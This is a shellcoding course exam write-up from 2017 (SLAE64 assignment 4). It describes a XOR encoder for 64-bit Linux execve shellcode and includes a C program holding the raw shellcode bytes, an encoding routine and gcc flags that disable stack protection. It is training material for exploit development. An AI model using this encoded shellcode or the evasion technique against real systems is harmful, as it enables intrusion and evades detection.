Friday, October 13, 2017

SLAE64 Exam - Assignment 4 of 7 (Custom Encoder Shellcode)

This post covers the fourth of the 7 exam assignments for Pentester Academy's x86/64 Assembly and Shellcoding on Linux course.

SLAE64 - 1501

Success in these 7 assignments results in the Pentester Academy's SLAE64 certification.

• Create a custom encoding scheme like the "Insertion Encoder" we showed you
• PoC using execve-stack as the shellcode to encode with your scheme and execute


I started from the execve-stack.nasm we created in the course and chose a XOR encoder.  I inspected the assembled shellcode for null bytes and confirmed there were none; a null would terminate the C-string payload in the test harness and truncate the shellcode.

I extracted its opcode bytes using a modified objdump command.

I pasted the opcode bytes into a XOR encoding script.  That script is here.  The one thing to watch when picking the key: a byte equal to the key XORs to 0x00, so the key must be nonzero and must not appear anywhere in the shellcode, or the encoded output gains the null byte the encoder was supposed to avoid.

I ran the script and it output the XOR-encoded opcode bytes.

Then I pasted the encoded opcode into a XOR decoder NASM stub.  That script is here.  The stub walks the encoded bytes that follow it, XORs each one with the key in place, and falls through into the now-decoded shellcode.  Because it rewrites itself, the memory it runs from has to be both writable and executable, and the stub itself must contain no null bytes either.

After assembling and linking with nasm and ld, I checked the whole thing (decoder plus encoded payload) for null bytes using the objdump command.

I extracted the final opcode bytes using the same modified objdump command.

Then I pasted the opcode bytes into the shellcode.c template.

I compiled shellcode.c using the following command:

$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode

-fno-stack-protector disables the stack canary, and -z execstack marks the stack executable (historically, via the kernel's read-implies-exec behaviour, this also left the buffer holding the payload executable), which is what lets the harness jump into the buffer and lets the decoder stub rewrite it in place.

Then I executed the shellcode binary.  It worked.  Yay.
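The encoding half of the procedure above, as an added example that is not the post's own script: a self-contained C program that takes the execve-stack shellcode bytes, checks them for nulls, picks a XOR key that cannot produce a null (nonzero and not equal to any payload byte), encodes, verifies the round trip the NASM decoder stub will perform, and prints the payload in the "\xNN" form the shellcode.c template expects. The embedded bytes are the 32-byte execve("//bin/sh") stack shellcode as nasm assembles the course's execve-stack.nasm; that they match the post's build is an assumption, so substitute your own objdump output if yours differs. The key search start value 0xaa is arbitrary.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Bytes of the course's execve-stack.nasm (push "//bin/sh" on the stack,
 * then execve via syscall 59) as nasm -f elf64 assembles it. Assumed to
 * match the post's build; replace with your own objdump output otherwise. */
static const uint8_t execve_stack[] = {
    0x48, 0x31, 0xc0,                                           /* xor rax, rax        */
    0x50,                                                       /* push rax            */
    0x48, 0xbb, 0x2f, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, /* mov rbx, '//bin/sh' */
    0x53,                                                       /* push rbx            */
    0x48, 0x89, 0xe7,                                           /* mov rdi, rsp        */
    0x50,                                                       /* push rax            */
    0x48, 0x89, 0xe2,                                           /* mov rdx, rsp        */
    0x57,                                                       /* push rdi            */
    0x48, 0x89, 0xe6,                                           /* mov rsi, rsp        */
    0x48, 0x83, 0xc0, 0x3b,                                     /* add rax, 59         */
    0x0f, 0x05                                                  /* syscall             */
};
#define EXECVE_STACK_LEN (sizeof execve_stack)

/* 1 if any byte is 0x00. The shellcode.c template stores the payload as a
 * C string, so a null would truncate it. Run this on plain and encoded bytes. */
int has_null(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0x00)
            return 1;
    return 0;
}

/* Picks a XOR key. b ^ key == 0 exactly when b == key, so a key that occurs
 * anywhere in the payload would put a null into the encoded output; the key
 * must also be nonzero or the "encoding" is the identity. Scans from `start`
 * upward (wrapping) and returns the first usable value, or -1 if none exists. */
int find_key(const uint8_t *buf, size_t len, uint8_t start)
{
    int used[256] = { 0 };
    for (size_t i = 0; i < len; i++)
        used[buf[i]] = 1;
    for (int n = 0; n < 256; n++) {
        uint8_t k = (uint8_t)(start + n);
        if (k != 0 && !used[k])
            return k;
    }
    return -1;
}

/* XOR is its own inverse: this routine encodes, and applied again with the
 * same key it is exactly what the NASM decoder stub does byte by byte. */
void xor_bytes(const uint8_t *in, uint8_t *out, size_t len, uint8_t key)
{
    for (size_t i = 0; i < len; i++)
        out[i] = in[i] ^ key;
}

/* Encoded byte at index i for a given key, or -1 if out of range. */
int encoded_byte(size_t i, uint8_t key)
{
    return i < EXECVE_STACK_LEN ? (execve_stack[i] ^ key) : -1;
}

/* The check to run before pasting into the decoder: the encoded payload is
 * null-free and decoding it restores the original shellcode exactly. */
int roundtrip_ok(uint8_t key)
{
    uint8_t enc[EXECVE_STACK_LEN], dec[EXECVE_STACK_LEN];
    xor_bytes(execve_stack, enc, EXECVE_STACK_LEN, key);
    if (has_null(enc, EXECVE_STACK_LEN))
        return 0;
    xor_bytes(enc, dec, EXECVE_STACK_LEN, key);
    return memcmp(dec, execve_stack, EXECVE_STACK_LEN) == 0;
}

/* Renders bytes as "\xNN\xNN..." for the shellcode.c template.
 * Returns the number of characters written, or 0 if `out` is too small. */
size_t format_c_string(const uint8_t *buf, size_t len, char *out, size_t outsz)
{
    size_t pos = 0;
    for (size_t i = 0; i < len; i++) {
        int n = snprintf(out + pos, outsz - pos, "\\x%02x", buf[i]);
        if (n < 0 || (size_t)n >= outsz - pos)
            return 0;
        pos += (size_t)n;
    }
    return pos;
}

int main(void)
{
    if (has_null(execve_stack, EXECVE_STACK_LEN)) {
        fputs("original shellcode contains a null byte\n", stderr);
        return 1;
    }
    int key = find_key(execve_stack, EXECVE_STACK_LEN, 0xaa); /* 0xaa: arbitrary start */
    if (key < 0 || !roundtrip_ok((uint8_t)key)) {
        fputs("no usable XOR key for this payload\n", stderr);
        return 1;
    }
    uint8_t enc[EXECVE_STACK_LEN];
    char text[EXECVE_STACK_LEN * 4 + 1];
    xor_bytes(execve_stack, enc, EXECVE_STACK_LEN, (uint8_t)key);
    format_c_string(enc, EXECVE_STACK_LEN, text, sizeof text);
    printf("key: 0x%02x\nencoded (%zu bytes): \"%s\"\n", key, EXECVE_STACK_LEN, text);
    return 0;
}
```

The key printed by this program is the constant the decoder stub XORs with, and the encoded string is what goes after the stub; if you change the key search start, rerun the check rather than trusting that any nonzero key is safe.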
